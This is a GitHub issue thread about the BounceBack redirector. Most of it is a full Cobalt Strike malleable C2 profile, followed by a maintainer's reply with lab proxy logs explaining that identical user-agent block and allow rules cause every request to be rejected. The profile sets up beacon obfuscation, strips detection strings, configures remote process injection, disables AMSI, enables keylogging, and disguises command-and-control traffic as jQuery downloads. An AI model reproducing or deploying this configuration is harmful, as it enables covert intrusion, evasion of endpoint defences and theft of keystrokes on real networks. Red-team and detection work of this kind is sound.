Closed BlackSnufkin closed 9 months ago
Please give me an example of profile, that was rejected.
set host_stage "false";
set sleeptime "60000000";
set jitter "45";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20";
# Task and Proxy Max Size
set tasks_max_size "1048576";
set tasks_proxy_max_size "921600";
set tasks_dns_proxy_max_size "71680";
set data_jitter "100";
set smb_frame_header "";
set pipename "SapIServerPipes-1-5-5-07903";
set pipename_stager "SapIServerPipes-1-5-5-04218";
set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
set ssh_pipename "SapIServerPipes-1-5-5-0##";
stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";
#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";
set checksum "0";
set compile_time "31 Jul 2090 12:56:16";
set entry_point "186192";
set image_size_x86 "1490944";
set image_size_x64 "1490944";
set name "WMNetMgr.DLL";
set rich_header "\x35\xe0\x65\x56\x71\x81\x0b\x05\x71\x81\x0b\x05\x71\x81\x0b\x05\x2a\xe9\x08\x04\x72\x81\x0b\x05\x2a\xe9\x0f\x04\x66\x81\x0b\x05\x71\x81\x0a\x05\xf7\x80\x0b\x05\x2a\xe9\x0a\x04\x7c\x81\x0b\x05\x2a\xe9\x0e\x04\x79\x81\x0b\x05\x2a\xe9\x0b\x04\x70\x81\x0b\x05\x2a\xe9\x05\x04\xb9\x81\x0b\x05\x2a\xe9\xf4\x05\x70\x81\x0b\x05\x2a\xe9\x09\x04\x70\x81\x0b\x05\x52\x69\x63\x68\x71\x81\x0b\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
transform-x86 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "NtQueueApcThread" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "beacon.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
transform-x64 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "beacon.x64.dll" "";
strrep "NtQueueApcThread" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "beacon.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
}
process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";
# shape the content and properties of what we will inject
set min_alloc "8192";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
transform-x64 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
# specify how we execute code in the remote process
execute {
CreateThread "ntdll.dll!RtlUserThreadStart+0x631";
NtQueueApcThread-s;
SetThreadContext;
CreateRemoteThread;
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
RtlCreateUserThread;
}
}
post-ex {
# control the temporary process we spawn to
set spawnto_x86 "%windir%\\syswow64\\mtstocom.exe";
set spawnto_x64 "%windir%\\sysnative\\mtstocom.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# control the method used to log keystrokes
set keylogger "GetAsyncKeyState";
}
post-ex {
set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
set pipename "Winsock2\\CatalogChangeListener-###-0,";
set keylogger "GetAsyncKeyState";
}
set steal_token_access_mask "0"; # TOKEN_ALL_ACCESS
stage {
set allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set magic_pe "NO";
set userwx "false";
set stomppe "true";
set obfuscate "true";
set cleanup "true";
set sleep_mask "true";
set smartinject "true";
set checksum "0";
set compile_time "11 Nov 2016 04:08:32";
set entry_point "650688";
set image_size_x86 "4661248";
set image_size_x64 "4661248";
set name "srv.dll";
set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
set syscall_method "None";
transform-x86 { # transform the x86 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
}
transform-x64 { # transform the x64 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
}
stringw "jQuery"; # Add this string to the DLL
}
process-inject {
set allocator "NtMapViewOfSection";
set bof_allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set bof_reuse_memory "true";
set min_alloc "17500";
set startrwx "false";
set userwx "false";
transform-x86 {
prepend "\x90\x90";
}
transform-x64 {
prepend "\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart+0x42";
CreateThread;
NtQueueApcThread-s;
CreateRemoteThread;
RtlCreateUserThread;
}
}
http-config {
set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
header "Server" "Apache";
header "Keep-Alive" "timeout=10, max=100";
header "Connection" "Keep-Alive";
set trust_x_forwarded_for "true";
set block_useragents "curl*,lynx*,wget*";
set allow_useragents "curl*,lynx*,wget*";
}
http-get {
set uri "/jquery-3.3.1.min.js";
set verb "GET";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
metadata {
base64url;
prepend "__cfduid=";
header "Cookie";
}
}
server {
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
output {
mask;
base64url;
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
}
http-post {
set uri "/jquery-3.3.2.min.js";
set verb "POST";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
id {
mask;
base64url;
parameter "__cfduid";
}
output {
mask;
base64url;
print;
}
}
server {
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
output {
mask;
base64url;
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
}
Tested your profile and found some bug related to user agents. All the tests was done with CS 4.4.
In the profile you provided both block_useragents
and allow_useragents
are enabled and equal, that causes BounceBack (and CobaltStrike) to reject every request it got.
set block_useragents "curl*,lynx*,wget*";
set allow_useragents "curl*,lynx*,wget*";
Here you can see a log from BounceBack with requests blocking because of wrong user agents configuration:
2023-11-08T17:50:14+03:00 INF Starting proxy listen=0.0.0.0:80 proxy="example http proxy" target=http://127.0.0.1:8080 type=http
2023-11-08T17:50:35+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Cookie":["__cfduid=asDRcEsge9ZI1zmsXpNAYC2nXQNh41HI_gDYvJSrJXsiPfqmoq1JbSY_85YhtyeyMd4X0BLHa6gabvf43BqZgU7JzogbjmliCgnHqRlLaUrHLVrRztUKaTD0XeyqBrGlZM9DIfr6CnSfOOuMx3FUg73FB0yyxKBOIX5m0pnsZ-E"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=GET proxy="example http proxy" url=/jquery-3.3.1.min.js
2023-11-08T17:50:35+03:00 DBG allow_useragents did not match from=192.168.40.129 match=["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"] proxy="example http proxy" rule=example_malleable_rule
2023-11-08T17:50:35+03:00 WRN Rejected from=192.168.40.129 proxy="example http proxy" rule=example_malleable_rule
And even if CobaltStrike will got that request without BounceBack, it will also block the request:
[!] Request not allowed for useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/81.0.4044.34 safari/537.36 edg/81.0.416.20'. URI=/jquery-3.3.1.min.js Method=GET Remote Address=/127.0.0.1
However, if you will fix your profile (for tests I just removed allow_useragents
setting) it will work as intended:
2023-11-08T17:43:36+03:00 DBG Created new proxy listen=0.0.0.0:80 proxy="example http proxy" target=http://127.0.0.1:8080 type=http
2023-11-08T17:43:36+03:00 INF Starting proxy listen=0.0.0.0:80 proxy="example http proxy" target=http://127.0.0.1:8080 type=http
2023-11-08T17:44:49+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Cookie":["__cfduid=jiJOtks55p8HeU7XqqTocs9verc1mwmPUas_gnsOtx5ZUstsq3YHPbjqW6Vz5hay5WmAtupYUZn2dES649mGD9bSnrTjgUN-oATHAQMVArEistKoy8id6diXFSqU2FPPwk3nuJNbuPzO1A10ZO6VeVxvlnPlLkSzZ2lFBVa_MmI"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=GET proxy="example http proxy" url=/jquery-3.3.1.min.js
2023-11-08T17:44:49+03:00 DBG http-get match from=192.168.40.129 match= proxy="example http proxy" rule=example_malleable_rule
